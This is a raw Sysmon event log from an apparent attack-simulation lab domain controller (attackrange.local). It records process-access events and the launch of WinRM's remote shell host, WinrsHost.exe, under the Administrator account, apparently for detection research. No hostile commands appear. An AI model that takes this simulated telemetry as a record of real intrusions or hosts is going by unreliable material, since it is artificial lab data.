08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-16C4-5F84-EF3F-040000000000}0x43fef0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16CA-5F84-7200-000000007F01}41764196C:\Windows\system32\conhost.exe{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16CA-5F84-7200-000000007F01}4176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.089{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-16BF-5F84-36F9-030000000000}0x3f9360HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 